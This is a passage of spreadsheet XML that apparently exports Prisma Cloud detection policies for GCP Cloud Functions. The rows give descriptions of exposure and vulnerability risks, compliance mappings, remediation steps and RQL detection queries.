      <c r="J2683" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2683" t="inlineStr">
        <is>
          <t>GCP Cloud Function is publicly accessible</t>
        </is>
      </c>
      <c r="L2683" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2683" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2683" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2683" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2683" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2683" t="inlineStr">
        <is>
          <t>164.312(e)</t>
        </is>
      </c>
      <c r="R2683" t="inlineStr">
        <is>
          <t>164.312(e)(2)(i)</t>
        </is>
      </c>
      <c r="S2683" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2683" t="b">
        <v>0</v>
      </c>
      <c r="U2683" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2683" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2683" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that are publicly accessible. Allowing 'allusers' / 'allAuthenticatedUsers' to cloud functions can lead to unauthorised invocations of the functions or unwanted access to sensitive information. It is recommended to follow least privileged access policy and grant access restrictively.</t>
        </is>
      </c>
      <c r="X2683" t="inlineStr">
        <is>
          <t>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Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-107
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-107</t>
        </is>
      </c>
      <c r="Y2683" t="inlineStr"/>
      <c r="Z2683" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-cloud-function' AND json.rule = status equals ACTIVE and iamPolicy.bindings[?any(members[*] is member of ("allAuthenticatedUsers","allUsers"))] exists
{"category":"General","resourceTypes":["google_cloudfunctions_function_iam_member","google_cloudfunctions_function_iam_binding","google_cloudfunctions2_function_iam_member","google_cloudfunctions2_function_iam_binding"]}</t>
        </is>
      </c>
      <c r="AA2683" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2683" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2683" t="inlineStr">
        <is>
          <t>PC-GCP-FUN-930-CKV_GCP_107</t>
        </is>
      </c>
      <c r="AD2683" t="b">
        <v>1</v>
      </c>
      <c r="AE2683" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2683" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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3" t="inlineStr">
        <is>
          <t>34836a26-00ef-4e29-80f7-93e16611f0a5</t>
        </is>
      </c>
      <c r="AI2683" t="inlineStr">
        <is>
          <t>9d657a8a-6c31-4bb5-8bb8-d0d55d04263b</t>
        </is>
      </c>
      <c r="AJ2683" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2683" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2684">
      <c r="A2684" t="inlineStr"/>
      <c r="B2684" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2684" s="2" t="inlineStr"/>
      <c r="D2684" t="inlineStr"/>
      <c r="E2684" t="inlineStr"/>
      <c r="F2684" t="inlineStr"/>
      <c r="G2684" t="b">
        <v>1</v>
      </c>
      <c r="H26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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2684" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2684" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) risk due to publicly exposed and vulnerable GCP Cloud Function [Node.js, CVE-2021-21315]</t>
        </is>
      </c>
      <c r="L2684" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2684" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2684" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2684" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2684" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2684" t="inlineStr"/>
      <c r="R2684" t="inlineStr"/>
      <c r="S2684" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2684" t="b">
        <v>0</v>
      </c>
      <c r="U2684" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2684" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2684" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions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GCP Cloud Function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Node.js [CVE-2021-21315] vulnerability and public exposure reported for the GCP Cloud Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2684"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2684" t="inlineStr"/>
      <c r="Z2684" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('gcloud-cloud-function') and finding.name contains all ('GCP Cloud Function is publicly accessible') AND with : (Vuln WHERE id IN ('CVE-2021-21315'))</t>
        </is>
      </c>
      <c r="AA2684" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2684" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:51</t>
        </is>
      </c>
      <c r="AC2684" t="inlineStr"/>
      <c r="AD2684" t="b">
        <v>1</v>
      </c>
      <c r="AE2684" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2684" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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4" t="inlineStr">
        <is>
          <t>0e7c5818-c498-4262-9386-8c858cf6bc45</t>
        </is>
      </c>
      <c r="AI2684" t="inlineStr">
        <is>
          <t>70e37b08-f32e-4440-86d3-c2f3df3c31fc</t>
        </is>
      </c>
      <c r="AJ2684" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2684" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2685">
      <c r="A2685" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, ISO/IEC 27001:2022, CRI Profile v2.0, NIST CSF v2.0, New Zealand Information Security Manual (NZISM v3.4), Risk Management in Technology (RMiT), Insurance Regulatory And Development Authority Of India, ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v7.1, CRI Profile v1.2.1, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, ISO 27002:2022, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, PCI DSS v4.0, ACSC Information Security Manual (ISM), DORA, NIST CSF v2.0, TX-RAMP Level 2, PCI DSS v4.0, PCI DSS v4.0, kfirdaus AWS Account-CS, kfirdaus AWS Account-CS, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), CRI Profile v1.2.1, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, CRI Profile v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2685" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2685" s="2" t="inlineStr"/>
      <c r="D2685" t="n">
        <v>0</v>
      </c>
      <c r="E2685" t="n">
        <v>11</v>
      </c>
      <c r="F2685" t="n">
        <v>0</v>
      </c>
      <c r="G2685" t="b">
        <v>1</v>
      </c>
      <c r="H26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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2685" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2685" t="inlineStr">
        <is>
          <t>GCP Cloud Function HTTP trigger is not secured</t>
        </is>
      </c>
      <c r="L2685" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2685" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2685" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2685" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2685" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2685" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R2685" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S2685" t="inlineStr">
        <is>
          <t>Prisma_Cloud,Policy Status Review</t>
        </is>
      </c>
      <c r="T2685" t="b">
        <v>0</v>
      </c>
      <c r="U2685" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2685" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2685" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions for which the HTTP trigger is not secured. When you configure HTTP functions to be triggered only with HTTPS, user requests will be redirected to use the HTTPS protocol, which is more secure. It is recommended to set the 'Require HTTPS' for configuring HTTP triggers while deploying your function.</t>
        </is>
      </c>
      <c r="X2685" t="inlineStr">
        <is>
          <t>1. Login to GCP console
2. Navigate to 'Cloud Functions' service (Left Panel)
3. Click on the alerting function
4. Click on 'EDIT'
5. Under section 'Trigger', click on 'EDIT'
6. Select the checkbox against the field 'Require HTTPS'
7. Click on 'SAVE'
8. Click on 'NEXT'
9. Click on 'DEPLOY' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-cloud-function-http-trigger-is-secured
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-cloud-function-http-trigger-is-secured</t>
        </is>
      </c>
      <c r="Y2685" t="inlineStr"/>
      <c r="Z2685" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-cloud-function' AND json.rule = status equals ACTIVE and httpsTrigger exists and httpsTrigger.securityLevel does not equal SECURE_ALWAYS
{"category":"Networking","resourceTypes":["google_cloudfunctions_function"]}</t>
        </is>
      </c>
      <c r="AA2685" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB2685" t="inlineStr">
        <is>
          <t>2024-11-19 10:55:34</t>
        </is>
      </c>
      <c r="AC2685" t="inlineStr">
        <is>
          <t>PC-GCP-FUN-776-CKV2_GCP_10</t>
        </is>
      </c>
      <c r="AD2685" t="b">
        <v>1</v>
      </c>
      <c r="AE2685" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2685" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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5" t="inlineStr">
        <is>
          <t>4eab897c-f9a8-439d-b3d5-ac48f5d827e7</t>
        </is>
      </c>
      <c r="AI2685" t="inlineStr">
        <is>
          <t>ff6a26a5-f036-4d3a-a650-d5de1d568bab</t>
        </is>
      </c>
      <c r="AJ2685" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2685" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2686">
      <c r="A2686" t="inlineStr"/>
      <c r="B2686" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2686" s="2" t="inlineStr"/>
      <c r="D2686" t="inlineStr"/>
      <c r="E2686" t="inlineStr"/>
      <c r="F2686" t="inlineStr"/>
      <c r="G2686" t="b">
        <v>1</v>
      </c>
      <c r="H26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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2686" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2686" t="inlineStr">
        <is>
          <t>Unauthorized Resource Creation risk due to a publicly exposed and vulnerable GCP Cloud Function with risky Deployment Manager permissions</t>
        </is>
      </c>
      <c r="L2686" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2686" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2686" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2686" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2686" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2686" t="inlineStr"/>
      <c r="R2686" t="inlineStr"/>
      <c r="S2686" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2686" t="b">
        <v>0</v>
      </c>
      <c r="U2686" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2686" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2686" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that are publicly exposed with critical or high vulnerabilities and have risky Deployment Manager permissions.
Publicly exposed vulnerable Cloud Functions could allow malicious actors to remotely exploit the vulnerability to get initial access to the Cloud function. Cloud Functions with deployment manager permissions could further expand the surface of the attack and grant unauthorized access to create any new resource in the project and cause internet exposure, privilege escalation, or lateral movements.
This policy checks for the following permissions:
'deploymentmanager.deployments.create', 'deploymentmanager.deployments.update'
Immediate attention is required to review role assignments and grant only the least privileges required. Remediate critical and high vulnerabilities, and restrict public exposure reported for the Cloud Functions as soon as possible.</t>
        </is>
      </c>
      <c r="X2686"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[PERMISSION]
Remediation steps:
1. Log in to the GCP console
2. Navigate to the Cloud Function
3. Navigate to the IAM service
4. Find the binding between the service account used by the function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86" t="inlineStr"/>
      <c r="Z2686" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-cloud-function') and finding.name contains all ('GCP Cloud Function is publicly accessible','GCP Cloud Function with permissions over Deployments Manager') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2686" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2686" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2686" t="inlineStr"/>
      <c r="AD2686" t="b">
        <v>1</v>
      </c>
      <c r="AE2686" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2686" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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6" t="inlineStr">
        <is>
          <t>0a4324d6-2847-49d5-9134-7c3934b5e695</t>
        </is>
      </c>
      <c r="AI2686" t="inlineStr">
        <is>
          <t>c92bf1f1-c814-48a0-9492-1bc01365f287</t>
        </is>
      </c>
      <c r="AJ2686" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2686" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2687">
      <c r="A2687" t="inlineStr"/>
      <c r="B2687" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2687" s="2" t="inlineStr"/>
      <c r="D2687" t="inlineStr"/>
      <c r="E2687" t="inlineStr"/>
      <c r="F2687" t="inlineStr"/>
      <c r="G2687" t="b">
        <v>1</v>
      </c>
      <c r="H26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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2687" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2687" t="inlineStr">
        <is>
          <t>Privilege escalation and lateral movement risk due to a publicly exposed and vulnerable GCP Cloud Function with primitive basic role assigned</t>
        </is>
      </c>
      <c r="L2687" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2687" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2687" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2687" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2687" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2687" t="inlineStr"/>
      <c r="R2687" t="inlineStr"/>
      <c r="S2687" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2687" t="b">
        <v>0</v>
      </c>
      <c r="U2687" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2687" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2687" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that are publicly exposed with critical or high vulnerabilities and have primitive basic role attached.
Publicly exposed vulnerable Cloud Functions could allow malicious actors to remotely exploit the vulnerability to get initial access to the resource. Basic roles are highly permissive roles that existed prior to the introduction of IAM. Basic roles on the instance further helps the attackers to escalate their privileges, move laterally or perform other unauthorized actions in the cloud account.
This policy checks for the following basic roles:
'roles/editor', 'roles/owner'
Immediate attention is required to review role assignments and grant only the least privileges required. Remove unwanted roles assigned to the Cloud Function. Remediate critical and high vulnerabilities, and restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2687"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[MISCONFIGURATION]
It is recommended to the principle of least privilege for granting access.
To assign desired service account to the cloud funtion, please refer to the URL given below:
https://cloud.google.com/functions/docs/securing/function-identity#individual
To update priviledges granted to a service account, please refer to the URL given below:
https://cloud.google.com/iam/docs/granting-changing-revoking-access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87" t="inlineStr"/>
      <c r="Z2687" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-cloud-function') and finding.name contains all ('GCP Cloud Function is publicly accessible','(Disabled) GCP Cloud Function has risky basic role assigned') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2687" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2687" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2687" t="inlineStr"/>
      <c r="AD2687" t="b">
        <v>1</v>
      </c>
      <c r="AE2687" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2687" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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7" t="inlineStr">
        <is>
          <t>866c5daf-c203-4251-a4ea-ac8a62fa02de</t>
        </is>
      </c>
      <c r="AI2687" t="inlineStr">
        <is>
          <t>77fcd9e8-a275-4c73-92dd-bb314d42c170</t>
        </is>
      </c>
      <c r="AJ2687" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2687" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2688">
      <c r="A2688" t="inlineStr"/>
      <c r="B2688" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2688" s="2" t="inlineStr"/>
      <c r="D2688" t="inlineStr"/>
      <c r="E2688" t="inlineStr"/>
      <c r="F2688" t="inlineStr"/>
      <c r="G2688" t="b">
        <v>1</v>
      </c>
      <c r="H26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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2688" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2688" t="inlineStr">
        <is>
          <t>Server Side Request Forgery (SSRF) risk due to publicly exposed and vulnerable GCP Cloud Function [Node.js, CVE-2020-28168]</t>
        </is>
      </c>
      <c r="L2688" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2688" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2688" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2688" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2688" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2688" t="inlineStr"/>
      <c r="R2688" t="inlineStr"/>
      <c r="S2688" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2688" t="b">
        <v>0</v>
      </c>
      <c r="U2688" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2688" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2688" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that are publicly exposed and have known exploitable server side request forgery vulnerability [Node.js, CVE-2020-28168].
Server side request forgery vulnerability is a security flaw allowing an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. The fact that the GCP Cloud Function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Node.js [CVE-2020-28168] vulnerability and public exposure reported for the GCP Cloud Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2688"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2688" t="inlineStr"/>
      <c r="Z2688" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('gcloud-cloud-function') and finding.name contains all ('GCP Cloud Function is publicly accessible') AND with : (Vuln WHERE id IN ('CVE-2020-28168'))</t>
        </is>
      </c>
      <c r="AA2688" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2688" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:51</t>
        </is>
      </c>
      <c r="AC2688" t="inlineStr"/>
      <c r="AD2688" t="b">
        <v>1</v>
      </c>
      <c r="AE2688" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2688" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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8" t="inlineStr">
        <is>
          <t>723147c3-1ebd-47c1-a18d-50b48b3aae18</t>
        </is>
      </c>
      <c r="AI2688" t="inlineStr">
        <is>
          <t>d1263492-df03-4c9f-9217-6186428b4957</t>
        </is>
      </c>
      <c r="AJ2688" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2688" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2689">
      <c r="A2689" t="inlineStr"/>
      <c r="B2689" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2689" s="2" t="inlineStr"/>
      <c r="D2689" t="inlineStr"/>
      <c r="E2689" t="inlineStr"/>
      <c r="F2689" t="inlineStr"/>
      <c r="G2689" t="b">
        <v>1</v>
      </c>
      <c r="H26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89" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2689" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2689" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) risk due to a publicly exposed (via resource based policies) GCP Cloud Function with Spring4Shell vulnerability</t>
        </is>
      </c>
      <c r="L2689" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2689" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2689" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2689" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2689" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2689" t="inlineStr"/>
      <c r="R2689" t="inlineStr"/>
      <c r="S2689" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2689" t="b">
        <v>0</v>
      </c>
      <c r="U2689" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2689" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2689" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that have Spring4Shell vulnerabilities and are publicly exposed. 
Spring4Shell vulnerability is very critical and can compromise the confidentiality, integrity, and availability of data managed by a vulnerable application. The fact that the cloud function is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Spring4Shell vulnerabilities [CVE-2022-22965 and CVE-2022-22963] and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X2689"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689" t="inlineStr"/>
      <c r="Z2689" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-cloud-function') and finding.name contains all ('GCP Cloud Function is publicly accessible') AND with : (Vuln WHERE id IN ('CVE-2022-22963', 'CVE-2022-22965'))</t>
        </is>
      </c>
      <c r="AA2689" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2689" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:25</t>
        </is>
      </c>
      <c r="AC2689" t="inlineStr"/>
      <c r="AD2689" t="b">
        <v>1</v>
      </c>
      <c r="AE2689" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2689" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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89" t="inlineStr">
        <is>
          <t>acccf7a7-5385-4aa0-994f-92b8bd1bb1de</t>
        </is>
      </c>
      <c r="AI2689" t="inlineStr">
        <is>
          <t>be0f1eb4-6999-49b6-aa76-1402989c35ab</t>
        </is>
      </c>
      <c r="AJ2689" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2689" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2690">
      <c r="A2690" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, RBI Baseline Cyber Security and Resilience Requirements, kashan ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), kfirdaus AWS Account-CS, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), Insurance Regulatory And Development Authority Of India, Copy of CIS Controls v8, CRI Profile v1.2.1, CIS Controls v8, kfirdaus AWS Account-CS, CIS Controls v8, CRI Profile v2.0, Telecommunications Security Act - TSA, SOC 2, kashan ACSC Information Security Manual (ISM), SOC 2, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27001:2022, FFIEC</t>
        </is>
      </c>
      <c r="B2690" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2690" s="2" t="inlineStr"/>
      <c r="D2690" t="inlineStr"/>
      <c r="E2690" t="inlineStr"/>
      <c r="F2690" t="inlineStr"/>
      <c r="G2690" t="b">
        <v>1</v>
      </c>
      <c r="H26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90" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2690" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2690" t="inlineStr">
        <is>
